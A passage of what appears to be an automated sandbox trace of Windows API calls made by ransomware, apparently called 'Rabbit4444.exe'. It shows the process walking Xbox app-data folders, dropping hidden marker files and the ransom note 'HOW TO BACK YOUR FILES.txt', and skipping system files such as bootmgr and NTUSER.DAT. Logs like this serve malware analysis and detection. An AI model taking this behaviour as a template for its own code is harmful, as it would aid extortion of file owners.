returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies\\" [0062.094] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0062.094] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.095] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.097] FlushFileBuffers (hFile=0x27c) returned 1 [0062.098] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.098] CloseHandle (hObject=0x27c) returned 1 [0062.098] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies") returned 98 [0062.099] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.099] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee548a17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0062.099] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.099] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.099] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.099] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.099] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee548a17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.099] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.099] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.099] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.099] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.099] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.099] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee548a17, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee548a17, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee56ea17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.099] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.099] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.099] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee548a17, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee548a17, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee56ea17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.099] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0062.099] lstrcpyW (in: lpString1=0x130ebfe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.099] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.100] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.100] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.101] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.101] CloseHandle (hObject=0x298) returned 1 [0062.101] CloseHandle (hObject=0x27c) returned 1 [0062.101] GetCurrentThreadId () returned 0xd98 [0062.101] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221e8 [0062.101] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache" [0062.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116930 | out: hHeap=0xe0000) returned 1 [0062.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0062.101] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache" [0062.101] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache\\" [0062.101] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0062.101] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.102] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.104] FlushFileBuffers (hFile=0x27c) returned 1 [0062.105] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.105] CloseHandle (hObject=0x27c) returned 1 [0062.106] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache") returned 96 [0062.106] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee56ea17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.106] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.106] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.106] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.106] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.106] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf2306679, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf2306679, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee56ea17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.106] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.106] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.106] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.106] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.106] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.106] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee56ea17, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee56ea17, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee56ea17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.106] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.106] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.106] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee56ea17, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee56ea17, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee56ea17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.106] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.107] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.107] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxidentityprovider_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.107] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.107] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.108] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.108] CloseHandle (hObject=0x298) returned 1 [0062.108] CloseHandle (hObject=0x27c) returned 1 [0062.108] GetCurrentThreadId () returned 0xd98 [0062.108] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122068 [0062.108] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe" [0062.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.108] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122060 | out: hHeap=0xe0000) returned 1 [0062.108] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe" [0062.108] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\" [0062.108] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0062.108] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.111] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.114] FlushFileBuffers (hFile=0x27c) returned 1 [0062.115] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.115] CloseHandle (hObject=0x27c) returned 1 [0062.115] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe") returned 78 [0062.115] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.115] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b10a7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x936165c3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee56ea17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0062.115] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.115] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.115] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.115] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.115] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b10a7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x936165c3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee56ea17, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.116] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.116] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.116] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.116] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.116] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.116] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee56ea17, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee56ea17, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee594c43, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.116] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.116] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.116] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x936165c3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9361c775, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9361c775, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0062.116] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.116] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.116] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0062.116] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0062.116] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0062.116] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0062.116] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0062.116] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0062.116] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0062.116] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0062.116] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0062.116] lstrcpyW (in: lpString1=0x130ebd6, lpString2="AC" | out: lpString1="AC") returned="AC" [0062.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0062.116] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x118de8 [0062.116] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221e8 | out: ListHead=0xf68b0, ListEntry=0x1221e8) returned 0x121fa8 [0062.116] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935c21cd, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935c21cd, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x935c21cd, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0062.116] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.116] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.116] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0062.116] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0062.116] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0062.116] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0062.116] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0062.116] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0062.116] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0062.117] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0062.117] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0062.117] lstrcpyW (in: lpString1=0x130ebd6, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0062.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0062.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x1240e0 [0062.117] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x1221e8 [0062.117] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b8588, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239b4f4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x935b8588, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0062.117] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0062.117] lstrcpyW (in: lpString1=0x130ebd6, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0062.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0062.117] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x11e2c0 [0062.117] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122008 [0062.117] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b10a7, 